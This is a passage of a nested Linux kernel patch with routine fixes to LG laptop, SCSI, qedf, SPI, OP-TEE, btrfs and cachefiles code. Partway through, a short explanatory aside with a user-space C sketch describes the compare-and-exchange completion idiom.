++	r = lg_wmab(dev, WM_FAN_MODE, WM_SET, (m & 0xffffff0f) | (value << 4));
+ 	kfree(r);
+-	r = lg_wmab(WM_FAN_MODE, WM_SET, (m & 0xfffffff0) | value);
++	r = lg_wmab(dev, WM_FAN_MODE, WM_SET, (m & 0xfffffff0) | value);
+ 	kfree(r);
+ 
+ 	return count;
+@@ -320,7 +296,7 @@ static ssize_t fan_mode_show(struct device *dev,
+ 	unsigned int status;
+ 	union acpi_object *r;
+ 
+-	r = lg_wmab(WM_FAN_MODE, WM_GET, 0);
++	r = lg_wmab(dev, WM_FAN_MODE, WM_GET, 0);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -347,7 +323,7 @@ static ssize_t usb_charge_store(struct device *dev,
+ 	if (ret)
+ 		return ret;
+ 
+-	r = lg_wmbb(WMBB_USB_CHARGE, WM_SET, value);
++	r = lg_wmbb(dev, WMBB_USB_CHARGE, WM_SET, value);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -361,7 +337,7 @@ static ssize_t usb_charge_show(struct device *dev,
+ 	unsigned int status;
+ 	union acpi_object *r;
+ 
+-	r = lg_wmbb(WMBB_USB_CHARGE, WM_GET, 0);
++	r = lg_wmbb(dev, WMBB_USB_CHARGE, WM_GET, 0);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -389,7 +365,7 @@ static ssize_t reader_mode_store(struct device *dev,
+ 	if (ret)
+ 		return ret;
+ 
+-	r = lg_wmab(WM_READER_MODE, WM_SET, value);
++	r = lg_wmab(dev, WM_READER_MODE, WM_SET, value);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -403,7 +379,7 @@ static ssize_t reader_mode_show(struct device *dev,
+ 	unsigned int status;
+ 	union acpi_object *r;
+ 
+-	r = lg_wmab(WM_READER_MODE, WM_GET, 0);
++	r = lg_wmab(dev, WM_READER_MODE, WM_GET, 0);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -431,7 +407,7 @@ static ssize_t fn_lock_store(struct device *dev,
+ 	if (ret)
+ 		return ret;
+ 
+-	r = lg_wmab(WM_FN_LOCK, WM_SET, value);
++	r = lg_wmab(dev, WM_FN_LOCK, WM_SET, value);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -445,7 +421,7 @@ static ssize_t fn_lock_show(struct device *dev,
+ 	unsigned int status;
+ 	union acpi_object *r;
+ 
+-	r = lg_wmab(WM_FN_LOCK, WM_GET, 0);
++	r = lg_wmab(dev, WM_FN_LOCK, WM_GET, 0);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -475,9 +451,9 @@ static ssize_t charge_control_end_threshold_store(struct device *dev,
+ 		union acpi_object *r;
+ 
+ 		if (battery_limit_use_wmbb)
+-			r = lg_wmbb(WMBB_BATT_LIMIT, WM_SET, value);
++			r = lg_wmbb(&pf_device->dev, WMBB_BATT_LIMIT, WM_SET, value);
+ 		else
+-			r = lg_wmab(WM_BATT_LIMIT, WM_SET, value);
++			r = lg_wmab(&pf_device->dev, WM_BATT_LIMIT, WM_SET, value);
+ 		if (!r)
+ 			return -EIO;
+ 
+@@ -496,7 +472,7 @@ static ssize_t charge_control_end_threshold_show(struct device *device,
+ 	union acpi_object *r;
+ 
+ 	if (battery_limit_use_wmbb) {
+-		r = lg_wmbb(WMBB_BATT_LIMIT, WM_GET, 0);
++		r = lg_wmbb(&pf_device->dev, WMBB_BATT_LIMIT, WM_GET, 0);
+ 		if (!r)
+ 			return -EIO;
+ 
+@@ -507,7 +483,7 @@ static ssize_t charge_control_end_threshold_show(struct device *device,
+ 
+ 		status = r->buffer.pointer[0x10];
+ 	} else {
+-		r = lg_wmab(WM_BATT_LIMIT, WM_GET, 0);
++		r = lg_wmab(&pf_device->dev, WM_BATT_LIMIT, WM_GET, 0);
+ 		if (!r)
+ 			return -EIO;
+ 
+@@ -586,7 +562,7 @@ static void tpad_led_set(struct led_classdev *cdev,
+ {
+ 	union acpi_object *r;
+ 
+-	r = lg_wmab(WM_TLED, WM_SET, brightness > LED_OFF);
++	r = lg_wmab(cdev->dev->parent, WM_TLED, WM_SET, brightness > LED_OFF);
+ 	kfree(r);
+ }
+ 
+@@ -608,16 +584,16 @@ static void kbd_backlight_set(struct led_classdev *cdev,
+ 		val = 0;
+ 	if (brightness >= LED_FULL)
+ 		val = 0x24;
+-	r = lg_wmab(WM_KEY_LIGHT, WM_SET, val);
++	r = lg_wmab(cdev->dev->parent, WM_KEY_LIGHT, WM_SET, val);
+ 	kfree(r);
+ }
+ 
+-static enum led_brightness get_kbd_backlight_level(void)
++static enum led_brightness get_kbd_backlight_level(struct device *dev)
+ {
+ 	union acpi_object *r;
+ 	int val;
+ 
+-	r = lg_wmab(WM_KEY_LIGHT, WM_GET, 0);
++	r = lg_wmab(dev, WM_KEY_LIGHT, WM_GET, 0);
+ 
+ 	if (!r)
+ 		return LED_OFF;
+@@ -645,7 +621,7 @@ static enum led_brightness get_kbd_backlight_level(void)
+ 
+ static enum led_brightness kbd_backlight_get(struct led_classdev *cdev)
+ {
+-	return get_kbd_backlight_level();
++	return get_kbd_backlight_level(cdev->dev->parent);
+ }
+ 
+ static LED_DEVICE(kbd_backlight, 255, LED_BRIGHT_HW_CHANGED);
+@@ -672,6 +648,11 @@ static struct platform_driver pf_driver = {
+ 
+ static int acpi_add(struct acpi_device *device)
+ {
++	struct platform_device_info pdev_info = {
++		.fwnode = acpi_fwnode_handle(device),
++		.name = PLATFORM_NAME,
++		.id = PLATFORM_DEVID_NONE,
++	};
+ 	int ret;
+ 	const char *product;
+ 	int year = 2017;
+@@ -683,9 +664,7 @@ static int acpi_add(struct acpi_device *device)
+ 	if (ret)
+ 		return ret;
+ 
+-	pf_device = platform_device_register_simple(PLATFORM_NAME,
+-						    PLATFORM_DEVID_NONE,
+-						    NULL, 0);
++	pf_device = platform_device_register_full(&pdev_info);
+ 	if (IS_ERR(pf_device)) {
+ 		ret = PTR_ERR(pf_device);
+ 		pf_device = NULL;
+@@ -778,7 +757,7 @@ static int acpi_remove(struct acpi_device *device)
+ }
+ 
+ static const struct acpi_device_id device_ids[] = {
+-	{"LGEX0815", 0},
++	{"LGEX0820", 0},
+ 	{"", 0}
+ };
+ MODULE_DEVICE_TABLE(acpi, device_ids);
+diff --git a/drivers/platform/x86/wireless-hotkey.c b/drivers/platform/x86/wireless-hotkey.c
+index 11c60a2734468..61ae722643e5a 100644
+--- a/drivers/platform/x86/wireless-hotkey.c
++++ b/drivers/platform/x86/wireless-hotkey.c
+@@ -19,6 +19,7 @@ MODULE_AUTHOR("Alex Hung");
+ MODULE_ALIAS("acpi*:HPQ6001:*");
+ MODULE_ALIAS("acpi*:WSTADEF:*");
+ MODULE_ALIAS("acpi*:AMDI0051:*");
++MODULE_ALIAS("acpi*:LGEX0815:*");
+ 
+ static struct input_dev *wl_input_dev;
+ 
+@@ -26,6 +27,7 @@ static const struct acpi_device_id wl_ids[] = {
+ 	{"HPQ6001", 0},
+ 	{"WSTADEF", 0},
+ 	{"AMDI0051", 0},
++	{"LGEX0815", 0},
+ 	{"", 0},
+ };
+ 
+diff --git a/drivers/s390/char/sclp.c b/drivers/s390/char/sclp.c
+index ae1d6ee382a50..889d719c2d1f9 100644
+--- a/drivers/s390/char/sclp.c
++++ b/drivers/s390/char/sclp.c
+@@ -1290,6 +1290,7 @@ sclp_init(void)
+ fail_unregister_reboot_notifier:
+ 	unregister_reboot_notifier(&sclp_reboot_notifier);
+ fail_init_state_uninitialized:
++	list_del(&sclp_state_change_event.list);
+ 	sclp_init_state = sclp_init_state_uninitialized;
+ 	free_page((unsigned long) sclp_read_sccb);
+ 	free_page((unsigned long) sclp_init_sccb);
+diff --git a/drivers/scsi/device_handler/scsi_dh_alua.c b/drivers/scsi/device_handler/scsi_dh_alua.c
+index 0781f991e7845..f5fc8631883d5 100644
+--- a/drivers/scsi/device_handler/scsi_dh_alua.c
++++ b/drivers/scsi/device_handler/scsi_dh_alua.c
+@@ -406,28 +406,40 @@ static char print_alua_state(unsigned char state)
+ 	}
+ }
+ 
+-static enum scsi_disposition alua_check_sense(struct scsi_device *sdev,
+-					      struct scsi_sense_hdr *sense_hdr)
++static void alua_handle_state_transition(struct scsi_device *sdev)
+ {
+ 	struct alua_dh_data *h = sdev->handler_data;
+ 	struct alua_port_group *pg;
+ 
++	rcu_read_lock();
++	pg = rcu_dereference(h->pg);
++	if (pg)
++		pg->state = SCSI_ACCESS_STATE_TRANSITIONING;
++	rcu_read_unlock();
++	alua_check(sdev, false);
++}
++
++static enum scsi_disposition alua_check_sense(struct scsi_device *sdev,
++					      struct scsi_sense_hdr *sense_hdr)
++{
+ 	switch (sense_hdr->sense_key) {
+ 	case NOT_READY:
+ 		if (sense_hdr->asc == 0x04 && sense_hdr->ascq == 0x0a) {
+ 			/*
+ 			 * LUN Not Accessible - ALUA state transition
+ 			 */
+-			rcu_read_lock();
+-			pg = rcu_dereference(h->pg);
+-			if (pg)
+-				pg->state = SCSI_ACCESS_STATE_TRANSITIONING;
+-			rcu_read_unlock();
+-			alua_check(sdev, false);
++			alua_handle_state_transition(sdev);
+ 			return NEEDS_RETRY;
+ 		}
+ 		break;
+ 	case UNIT_ATTENTION:
++		if (sense_hdr->asc == 0x04 && sense_hdr->ascq == 0x0a) {
++			/*
++			 * LUN Not Accessible - ALUA state transition
++			 */
++			alua_handle_state_transition(sdev);
++			return NEEDS_RETRY;
++		}
+ 		if (sense_hdr->asc == 0x29 && sense_hdr->ascq == 0x00) {
+ 			/*
+ 			 * Power On, Reset, or Bus Device Reset.
+@@ -494,7 +506,8 @@ static int alua_tur(struct scsi_device *sdev)
+ 
+ 	retval = scsi_test_unit_ready(sdev, ALUA_FAILOVER_TIMEOUT * HZ,
+ 				      ALUA_FAILOVER_RETRIES, &sense_hdr);
+-	if (sense_hdr.sense_key == NOT_READY &&
++	if ((sense_hdr.sense_key == NOT_READY ||
++	     sense_hdr.sense_key == UNIT_ATTENTION) &&
+ 	    sense_hdr.asc == 0x04 && sense_hdr.ascq == 0x0a)
+ 		return SCSI_DH_RETRY;
+ 	else if (retval)
+diff --git a/drivers/scsi/libsas/sas_internal.h b/drivers/scsi/libsas/sas_internal.h
+index a94bd0790b055..6ddccc67e808f 100644
+--- a/drivers/scsi/libsas/sas_internal.h
++++ b/drivers/scsi/libsas/sas_internal.h
+@@ -119,6 +119,20 @@ static inline void sas_fail_probe(struct domain_device *dev, const char *func, i
+ 		func, dev->parent ? "exp-attached" :
+ 		"direct-attached",
+ 		SAS_ADDR(dev->sas_addr), err);
++
++	/*
++	 * If the device probe failed, the expander phy attached address
++	 * needs to be reset so that the phy will not be treated as flutter
++	 * in the next revalidation
++	 */
++	if (dev->parent && !dev_is_expander(dev->dev_type)) {
++		struct sas_phy *phy = dev->phy;
++		struct domain_device *parent = dev->parent;
++		struct ex_phy *ex_phy = &parent->ex_dev.ex_phy[phy->number];
++
++		memset(ex_phy->attached_sas_addr, 0, SAS_ADDR_SIZE);
++	}
++
+ 	sas_unregister_dev(dev->port, dev);
+ }
+ 
+diff --git a/drivers/scsi/qedf/qedf.h b/drivers/scsi/qedf/qedf.h
+index c5c0bbdafc4ea..81b84757faae0 100644
+--- a/drivers/scsi/qedf/qedf.h
++++ b/drivers/scsi/qedf/qedf.h
+@@ -362,6 +362,7 @@ struct qedf_ctx {
+ #define QEDF_IN_RECOVERY		5
+ #define QEDF_DBG_STOP_IO		6
+ #define QEDF_PROBING			8
++#define QEDF_STAG_IN_PROGRESS		9
+ 	unsigned long flags; /* Miscellaneous state flags */
+ 	int fipvlan_retries;
+ 	u8 num_queues;
+diff --git a/drivers/scsi/qedf/qedf_main.c b/drivers/scsi/qedf/qedf_main.c
+index d969b0dc97326..179967774cc8c 100644
+--- a/drivers/scsi/qedf/qedf_main.c
++++ b/drivers/scsi/qedf/qedf_main.c
+@@ -318,11 +318,18 @@ static struct fc_seq *qedf_elsct_send(struct fc_lport *lport, u32 did,
+ 	 */
+ 	if (resp == fc_lport_flogi_resp) {
+ 		qedf->flogi_cnt++;
++		qedf->flogi_pending++;
++
++		if (test_bit(QEDF_UNLOADING, &qedf->flags)) {
++			QEDF_ERR(&qedf->dbg_ctx, "Driver unloading\n");
++			qedf->flogi_pending = 0;
++		}
++
+ 		if (qedf->flogi_pending >= QEDF_FLOGI_RETRY_CNT) {
+ 			schedule_delayed_work(&qedf->stag_work, 2);
+ 			return NULL;
+ 		}
+-		qedf->flogi_pending++;
++
+ 		return fc_elsct_send(lport, did, fp, op, qedf_flogi_resp,
+ 		    arg, timeout);
+ 	}
+@@ -911,13 +918,14 @@ void qedf_ctx_soft_reset(struct fc_lport *lport)
+ 	struct qedf_ctx *qedf;
+ 	struct qed_link_output if_link;
+ 
++	qedf = lport_priv(lport);
++
+ 	if (lport->vport) {
++		clear_bit(QEDF_STAG_IN_PROGRESS, &qedf->flags);
+ 		printk_ratelimited("Cannot issue host reset on NPIV port.\n");
+ 		return;
+ 	}
+ 
+-	qedf = lport_priv(lport);
+-
+ 	qedf->flogi_pending = 0;
+ 	/* For host reset, essentially do a soft link up/down */
+ 	atomic_set(&qedf->link_state, QEDF_LINK_DOWN);
+@@ -937,6 +945,7 @@ void qedf_ctx_soft_reset(struct fc_lport *lport)
+ 	if (!if_link.link_up) {
+ 		QEDF_INFO(&qedf->dbg_ctx, QEDF_LOG_DISC,
+ 			  "Physical link is not up.\n");
++		clear_bit(QEDF_STAG_IN_PROGRESS, &qedf->flags);
+ 		return;
+ 	}
+ 	/* Flush and wait to make sure link down is processed */
+@@ -949,6 +958,7 @@ void qedf_ctx_soft_reset(struct fc_lport *lport)
+ 		  "Queue link up work.\n");
+ 	queue_delayed_work(qedf->link_update_wq, &qedf->link_update,
+ 	    0);
++	clear_bit(QEDF_STAG_IN_PROGRESS, &qedf->flags);
+ }
+ 
+ /* Reset the host by gracefully logging out and then logging back in */
+@@ -3467,6 +3477,7 @@ static int __qedf_probe(struct pci_dev *pdev, int mode)
+ 	}
+ 
+ 	/* Start the Slowpath-process */
++	memset(&slowpath_params, 0, sizeof(struct qed_slowpath_params));
+ 	slowpath_params.int_mode = QED_INT_MODE_MSIX;
+ 	slowpath_params.drv_major = QEDF_DRIVER_MAJOR_VER;
+ 	slowpath_params.drv_minor = QEDF_DRIVER_MINOR_VER;
+@@ -3725,6 +3736,7 @@ static void __qedf_remove(struct pci_dev *pdev, int mode)
+ {
+ 	struct qedf_ctx *qedf;
+ 	int rc;
++	int cnt = 0;
+ 
+ 	if (!pdev) {
+ 		QEDF_ERR(NULL, "pdev is NULL.\n");
+@@ -3742,6 +3754,17 @@ static void __qedf_remove(struct pci_dev *pdev, int mode)
+ 		return;
+ 	}
+ 
++stag_in_prog:
++	if (test_bit(QEDF_STAG_IN_PROGRESS, &qedf->flags)) {
++		QEDF_ERR(&qedf->dbg_ctx, "Stag in progress, cnt=%d.\n", cnt);
++		cnt++;
++
++		if (cnt < 5) {
++			msleep(500);
++			goto stag_in_prog;
++		}
++	}
++
+ 	if (mode != QEDF_MODE_RECOVERY)
+ 		set_bit(QEDF_UNLOADING, &qedf->flags);
+ 
+@@ -4001,6 +4024,24 @@ void qedf_stag_change_work(struct work_struct *work)
+ 	struct qedf_ctx *qedf =
+ 	    container_of(work, struct qedf_ctx, stag_work.work);
+ 
++	if (!qedf) {
++		QEDF_ERR(&qedf->dbg_ctx, "qedf is NULL");
++		return;
++	}
++
++	if (test_bit(QEDF_IN_RECOVERY, &qedf->flags)) {
++		QEDF_ERR(&qedf->dbg_ctx,
++			 "Already is in recovery, hence not calling software context reset.\n");
++		return;
++	}
++
++	if (test_bit(QEDF_UNLOADING, &qedf->flags)) {
++		QEDF_ERR(&qedf->dbg_ctx, "Driver unloading\n");
++		return;
++	}
++
++	set_bit(QEDF_STAG_IN_PROGRESS, &qedf->flags);
++
+ 	printk_ratelimited("[%s]:[%s:%d]:%d: Performing software context reset.",
+ 			dev_name(&qedf->pdev->dev), __func__, __LINE__,
+ 			qedf->dbg_ctx.host_no);
+diff --git a/drivers/spi/spi-imx.c b/drivers/spi/spi-imx.c
+index 2c660a95c17e7..93e83fbc3403f 100644
+--- a/drivers/spi/spi-imx.c
++++ b/drivers/spi/spi-imx.c
+@@ -1040,7 +1040,7 @@ static struct spi_imx_devtype_data imx35_cspi_devtype_data = {
+ 	.rx_available = mx31_rx_available,
+ 	.reset = mx31_reset,
+ 	.fifo_size = 8,
+-	.has_dmamode = true,
++	.has_dmamode = false,
+ 	.dynamic_burst = false,
+ 	.has_slavemode = false,
+ 	.devtype = IMX35_CSPI,
+diff --git a/drivers/spi/spi-mux.c b/drivers/spi/spi-mux.c
+index 0709e987bd5ab..465d5b0e1d1a9 100644
+--- a/drivers/spi/spi-mux.c
++++ b/drivers/spi/spi-mux.c
+@@ -156,6 +156,7 @@ static int spi_mux_probe(struct spi_device *spi)
+ 	/* supported modes are the same as our parent's */
+ 	ctlr->mode_bits = spi->controller->mode_bits;
+ 	ctlr->flags = spi->controller->flags;
++	ctlr->bits_per_word_mask = spi->controller->bits_per_word_mask;
+ 	ctlr->transfer_one_message = spi_mux_transfer_one_message;
+ 	ctlr->setup = spi_mux_setup;
+ 	ctlr->num_chipselect = mux_control_states(priv->mux);
+diff --git a/drivers/tee/optee/ffa_abi.c b/drivers/tee/optee/ffa_abi.c
+index 0828240f27e62..b8ba360e863ed 100644
+--- a/drivers/tee/optee/ffa_abi.c
++++ b/drivers/tee/optee/ffa_abi.c
+@@ -657,7 +657,9 @@ static bool optee_ffa_api_is_compatbile(struct ffa_device *ffa_dev,
+ 					const struct ffa_ops *ops)
+ {
+ 	const struct ffa_msg_ops *msg_ops = ops->msg_ops;
+-	struct ffa_send_direct_data data = { OPTEE_FFA_GET_API_VERSION };
++	struct ffa_send_direct_data data = {
++		.data0 = OPTEE_FFA_GET_API_VERSION,
++	};
+ 	int rc;
+ 
+ 	msg_ops->mode_32bit_set(ffa_dev);
+@@ -674,7 +676,9 @@ static bool optee_ffa_api_is_compatbile(struct ffa_device *ffa_dev,
+ 		return false;
+ 	}
+ 
+-	data = (struct ffa_send_direct_data){ OPTEE_FFA_GET_OS_VERSION };
++	data = (struct ffa_send_direct_data){
++		.data0 = OPTEE_FFA_GET_OS_VERSION,
++	};
+ 	rc = msg_ops->sync_send_receive(ffa_dev, &data);
+ 	if (rc) {
+ 		pr_err("Unexpected error %d\n", rc);
+@@ -694,7 +698,9 @@ static bool optee_ffa_exchange_caps(struct ffa_device *ffa_dev,
+ 				    u32 *sec_caps,
+ 				    unsigned int *rpc_param_count)
+ {
+-	struct ffa_send_direct_data data = { OPTEE_FFA_EXCHANGE_CAPABILITIES };
++	struct ffa_send_direct_data data = {
++		.data0 = OPTEE_FFA_EXCHANGE_CAPABILITIES,
++	};
+ 	int rc;
+ 
+ 	rc = ops->msg_ops->sync_send_receive(ffa_dev, &data);
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index 80ca7b435b0d1..e482889667ec9 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -1222,7 +1222,7 @@ int btrfs_quota_enable(struct btrfs_fs_info *fs_info)
+ 
+ int btrfs_quota_disable(struct btrfs_fs_info *fs_info)
+ {
+-	struct btrfs_root *quota_root;
++	struct btrfs_root *quota_root = NULL;
+ 	struct btrfs_trans_handle *trans = NULL;
+ 	int ret = 0;
+ 
+@@ -1317,9 +1317,9 @@ int btrfs_quota_disable(struct btrfs_fs_info *fs_info)
+ 	btrfs_free_tree_block(trans, btrfs_root_id(quota_root),
+ 			      quota_root->node, 0, 1);
+ 
+-	btrfs_put_root(quota_root);
+ 
+ out:
++	btrfs_put_root(quota_root);
+ 	mutex_unlock(&fs_info->qgroup_ioctl_lock);
+ 	if (ret && trans)
+ 		btrfs_end_transaction(trans);
+diff --git a/fs/cachefiles/cache.c b/fs/cachefiles/cache.c
+index f449f7340aad0..9fb06dc165202 100644
+--- a/fs/cachefiles/cache.c
++++ b/fs/cachefiles/cache.c
+@@ -8,6 +8,7 @@
+ #include <linux/slab.h>
+ #include <linux/statfs.h>
+ #include <linux/namei.h>
++#include <trace/events/fscache.h>
+ #include "internal.h"
+ 
+ /*
+@@ -312,19 +313,59 @@ static void cachefiles_withdraw_objects(struct cachefiles_cache *cache)
+ }
+ 
+ /*
+- * Withdraw volumes.
++ * Withdraw fscache volumes.
++ */
++static void cachefiles_withdraw_fscache_volumes(struct cachefiles_cache *cache)
++{
++	struct list_head *cur;
++	struct cachefiles_volume *volume;
++	struct fscache_volume *vcookie;
++
++	_enter("");
++retry:
++	spin_lock(&cache->object_list_lock);
++	list_for_each(cur, &cache->volumes) {
++		volume = list_entry(cur, struct cachefiles_volume, cache_link);
++
++		if (atomic_read(&volume->vcookie->n_accesses) == 0)
++			continue;
++
++		vcookie = fscache_try_get_volume(volume->vcookie,
++						 fscache_volume_get_withdraw);
++		if (vcookie) {
++			spin_unlock(&cache->object_list_lock);
++			fscache_withdraw_volume(vcookie);
++			fscache_put_volume(vcookie, fscache_volume_put_withdraw);
++			goto retry;
++		}
++	}
++	spin_unlock(&cache->object_list_lock);
++
++	_leave("");
++}
++
++/*
++ * Withdraw cachefiles volumes.
+  */
+ static void cachefiles_withdraw_volumes(struct cachefiles_cache *cache)
+ {
+ 	_enter("");
+ 
+ 	for (;;) {
++		struct fscache_volume *vcookie = NULL;
+ 		struct cachefiles_volume *volume = NULL;
+ 
+ 		spin_lock(&cache->object_list_lock);
+ 		if (!list_empty(&cache->volumes)) {
+ 			volume = list_first_entry(&cache->volumes,
+ 						  struct cachefiles_volume, cache_link);
++			vcookie = fscache_try_get_volume(volume->vcookie,
++							 fscache_volume_get_withdraw);
++			if (!vcookie) {
++				spin_unlock(&cache->object_list_lock);
++				cpu_relax();
++				continue;
++			}
+ 			list_del_init(&volume->cache_link);
+ 		}
+ 		spin_unlock(&cache->object_list_lock);
+@@ -332,6 +373,7 @@ static void cachefiles_withdraw_volumes(struct cachefiles_cache *cache)
+ 			break;
+ 
+ 		cachefiles_withdraw_volume(volume);
++		fscache_put_volume(vcookie, fscache_volume_put_withdraw);
+ 	}
+ 
+ 	_leave("");
+@@ -371,6 +413,7 @@ void cachefiles_withdraw_cache(struct cachefiles_cache *cache)
+ 	pr_info("File cache on %s unregistering\n", fscache->name);
+ 
+ 	fscache_withdraw_cache(fscache);
++	cachefiles_withdraw_fscache_volumes(cache);
+ 
+ 	/* we now have to destroy all the active objects pertaining to this
+ 	 * cache - which we do by passing them off to thread pool to be
+diff --git a/fs/cachefiles/ondemand.c b/fs/cachefiles/ondemand.c
+index 51173ab6dbd84..2185e2908dba8 100644
+--- a/fs/cachefiles/ondemand.c
++++ b/fs/cachefiles/ondemand.c
+@@ -97,12 +97,12 @@ static loff_t cachefiles_ondemand_fd_llseek(struct file *filp, loff_t pos,
+ }
+ 
+ static long cachefiles_ondemand_fd_ioctl(struct file *filp, unsigned int ioctl,
+-					 unsigned long arg)
++					 unsigned long id)
+ {
+ 	struct cachefiles_object *object = filp->private_data;
+ 	struct cachefiles_cache *cache = object->volume->cache;
+ 	struct cachefiles_req *req;
+-	unsigned long id;
++	XA_STATE(xas, &cache->reqs, id);
+ 
+ 	if (ioctl != CACHEFILES_IOC_READ_COMPLETE)
+ 		return -EINVAL;
+@@ -110,10 +110,15 @@ static long cachefiles_ondemand_fd_ioctl(struct file *filp, unsigned int ioctl,
+ 	if (!test_bit(CACHEFILES_ONDEMAND_MODE, &cache->flags))
+ 		return -EOPNOTSUPP;
+ 
+-	id = arg;
+-	req = xa_erase(&cache->reqs, id);
+-	if (!req)
++	xa_lock(&cache->reqs);
++	req = xas_load(&xas);
++	if (!req || req->msg.opcode != CACHEFILES_OP_READ ||
++	    req->object != object) {
++		xa_unlock(&cache->reqs);
+ 		return -EINVAL;
++	}
++	xas_store(&xas, NULL);
++	xa_unlock(&cache->reqs);
+ 
+ 	trace_cachefiles_ondemand_cread(object, id);
+ 	complete(&req->done);
+@@ -142,6 +147,7 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 	unsigned long id;
+ 	long size;
+ 	int ret;
++	XA_STATE(xas, &cache->reqs, 0);
+ 
+ 	if (!test_bit(CACHEFILES_ONDEMAND_MODE, &cache->flags))
+ 		return -EOPNOTSUPP;
+@@ -165,10 +171,18 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 	if (ret)
+ 		return ret;
+ 
+-	req = xa_erase(&cache->reqs, id);
+-	if (!req)
++	xa_lock(&cache->reqs);
++	xas.xa_index = id;
++	req = xas_load(&xas);
++	if (!req || req->msg.opcode != CACHEFILES_OP_OPEN ||
++	    !req->object->ondemand->ondemand_id) {
++		xa_unlock(&cache->reqs);
+ 		return -EINVAL;
++	}
++	xas_store(&xas, NULL);
++	xa_unlock(&cache->reqs);
+ 
++	info = req->object->ondemand;
+ 	/* fail OPEN request if copen format is invalid */
+ 	ret = kstrtol(psize, 0, &size);
+ 	if (ret) {
+@@ -188,7 +202,6 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 		goto out;
+ 	}
+ 
+-	info = req->object->ondemand;
+ 	spin_lock(&info->lock);
+ 	/*
+ 	 * The anonymous fd was closed before copen ? Fail the request.
+@@ -228,6 +241,11 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 	wake_up_all(&cache->daemon_pollwq);
+ 
+ out:
++	spin_lock(&info->lock);
++	/* Set the object to closed state so it does not stay in reopening */
++	if (info->ondemand_id == CACHEFILES_ONDEMAND_ID_CLOSED)
++		cachefiles_ondemand_set_object_close(req->object);
++	spin_unlock(&info->lock);
+ 	complete(&req->done);
+ 	return ret;
+ }
+@@ -362,6 +380,20 @@ static struct cachefiles_req *cachefiles_ondemand_select_req(struct xa_state *xa
+ 	return NULL;
+ }
+ 
++static inline bool cachefiles_ondemand_finish_req(struct cachefiles_req *req,
++						  struct xa_state *xas, int err)
++{
++	if (unlikely(!xas || !req))
++		return false;
++
++	if (xa_cmpxchg(xas->xa, xas->xa_index, req, NULL, 0) != req)
++		return false;
++
++	req->error = err;
++	complete(&req->done);
++	return true;
++}
++
+ ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ 					char __user *_buffer, size_t buflen)
+ {
+@@ -425,16 +457,8 @@ ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ out:
+ 	cachefiles_put_object(req->object, cachefiles_obj_put_read_req);
+ 	/* Remove error request and CLOSE request has no reply */
+-	if (ret || msg->opcode == CACHEFILES_OP_CLOSE) {
+-		xas_reset(&xas);
+-		xas_lock(&xas);
+-		if (xas_load(&xas) == req) {
+-			req->error = ret;
+-			complete(&req->done);
+-			xas_store(&xas, NULL);
+-		}
+-		xas_unlock(&xas);
+-	}
++	if (ret || msg->opcode == CACHEFILES_OP_CLOSE)
++		cachefiles_ondemand_finish_req(req, &xas, ret);
+ 	cachefiles_req_put(req);
+ 	return ret ? ret : n;
+ }
+@@ -539,8 +563,18 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 		goto out;
+ 
+ 	wake_up_all(&cache->daemon_pollwq);
+-	wait_for_completion(&req->done);
+-	ret = req->error;
++wait:
++	ret = wait_for_completion_killable(&req->done);
++	if (!ret) {
++		ret = req->error;
++	} else {
++		ret = -EINTR;
++		if (!cachefiles_ondemand_finish_req(req, &xas, ret)) {
++			/* Someone will complete it soon. */
++			cpu_relax();
++			goto wait;
++		}
++	}
+ 	cachefiles_req_put(req);
+ 	return ret;
+ out:
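
The cachefiles_ondemand_finish_req() helper added above leans on xa_cmpxchg() so that exactly one contender -- the daemon-read error path or a killed waiter -- removes the request from the XArray and completes it. A minimal user-space sketch of the same claim-exactly-once idiom, using C11 atomics in place of the XArray slot:

	/* Illustrative only -- demo types, not the cachefiles ones. */
	#include <stdatomic.h>
	#include <stdbool.h>

	struct req { int error; };

	static _Atomic(struct req *) slot;

	/* Only the caller whose CAS swaps 'slot' from req to NULL may
	 * complete the request; every other racer sees the exchange
	 * fail and backs off. */
	static bool finish_req(struct req *req, int err)
	{
		struct req *expected = req;

		if (!atomic_compare_exchange_strong(&slot, &expected, NULL))
			return false;
		req->error = err;
		/* complete(&req->done) would go here in the kernel version */
		return true;
	}
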
+diff --git a/fs/cachefiles/volume.c b/fs/cachefiles/volume.c
+index 89df0ba8ba5e7..781aac4ef274b 100644
+--- a/fs/cachefiles/volume.c
++++ b/fs/cachefiles/volume.c
+@@ -133,7 +133,6 @@ void cachefiles_free_volume(struct fscache_volume *vcookie)
+ 
+ void cachefiles_withdraw_volume(struct cachefiles_volume *volume)
+ {
+-	fscache_withdraw_volume(volume->vcookie);
+ 	cachefiles_set_volume_xattr(volume);
+ 	__cachefiles_free_volume(volume);
+ }
+diff --git a/fs/dcache.c b/fs/dcache.c
+index 04f32dc8d1ad8..49461353ac37b 100644
+--- a/fs/dcache.c
++++ b/fs/dcache.c
+@@ -3209,28 +3209,25 @@ EXPORT_SYMBOL(d_splice_alias);
+   
+ bool is_subdir(struct dentry *new_dentry, struct dentry *old_dentry)
+ {
+-	bool result;
++	bool subdir;
+ 	unsigned seq;
+ 
+ 	if (new_dentry == old_dentry)
+ 		return true;
+ 
+-	do {
+-		/* for restarting inner loop in case of seq retry */
+-		seq = read_seqbegin(&rename_lock);
+-		/*
+-		 * Need rcu_readlock to protect against the d_parent trashing
+-		 * due to d_move
+-		 */
+-		rcu_read_lock();
+-		if (d_ancestor(old_dentry, new_dentry))
+-			result = true;
+-		else
+-			result = false;
+-		rcu_read_unlock();
+-	} while (read_seqretry(&rename_lock, seq));
+-
+-	return result;
